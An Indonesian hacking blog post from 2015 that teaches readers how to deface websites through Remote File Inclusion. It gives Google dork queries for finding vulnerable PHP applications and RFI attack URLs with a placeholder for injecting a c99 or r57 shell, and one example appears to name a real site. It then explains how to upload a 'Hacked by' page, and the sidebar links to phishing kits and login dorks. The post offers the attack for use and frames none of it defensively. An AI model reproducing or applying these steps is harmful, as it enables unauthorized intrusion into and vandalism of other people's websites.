Maaf, situs ini tidak berfungsi dengan baik tanpa JavaScript.

Cara Mudah Deface Web Via RFI

Oleh chmood

September 02, 2015

Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory

ls -al = Melihat Suatu Directory Lebih Dalam lagi

find = Mengecek Directory directory

cat = Membaca Suatu Berkas

wget = MengUpload suatu Files

tar -zxvf = MengExtraxt suatu files yang berbentuk tgz

pwd = Mengetahui Di Directory mana Kita Berada

uname -a = Keberadaan Path berada

w = Mengetahui Siapa Saja yang telah menggunakan Shell.

curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

– Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com

nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :

http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

– PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya …http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :

http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

– Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..

Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:

<html>

Hacked by Nama Kamu

</html>

Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:

http://target.com/lokasipathnya/index.html

Enjoy

Category

Vuln

Postingan Lebih Baru Postingan Lama

Cara Mudah Deface Web Via RFI

Backlink dengan Google Dork Seo

Cara Dapat Backlink dengan Google Dork

Lowongan Pekerjaan PT HM Sampoerna Tbk, Hari Ini Agustus 2023

Cara Dapat Backlink Edu Gratis

Hacking Jcow Social Networking Webserver

Kumpulan Phising & Fake Login Script

DOWNLOAD APP SCRAPEBOX PREMIUM FREE SEO

SEC ADMIN LOGIN DORK SQL LOGIN

TULISAN TERBALIK

App Baca Buku Pdf, Epub, Word, Mobi, Kindle, Android Tampa Iklan ReadEra